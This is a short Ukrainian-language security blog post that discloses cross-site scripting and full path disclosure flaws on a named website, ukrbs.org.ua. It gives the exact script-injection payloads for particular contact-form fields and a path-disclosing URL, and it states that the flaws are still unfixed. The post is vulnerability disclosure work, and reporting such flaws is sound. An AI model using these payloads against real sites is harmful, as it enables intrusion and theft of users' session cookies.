Websecurity - Веб безпека

29.09.2007

У квітні, 17.04.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://ukrbs.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Про одну з них я вже писав раніше стосовно уразливості в Google Custom Search Engine.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

05.03.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

XSS:

POST запит на сторінці http://ukrbs.org.ua/blog/contact/:

"><script>alert(document.cookie)</script>В полях: Ім’я, Пошта, Сайт.

</textarea><script>alert(document.cookie)</script>В полі: Повідомлення.

Full path disclosure:

http://ukrbs.org.ua/blog/index.php?m[]=

Дані уразливості досі не виправлені.

This entry was posted on 20:33 05.03.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.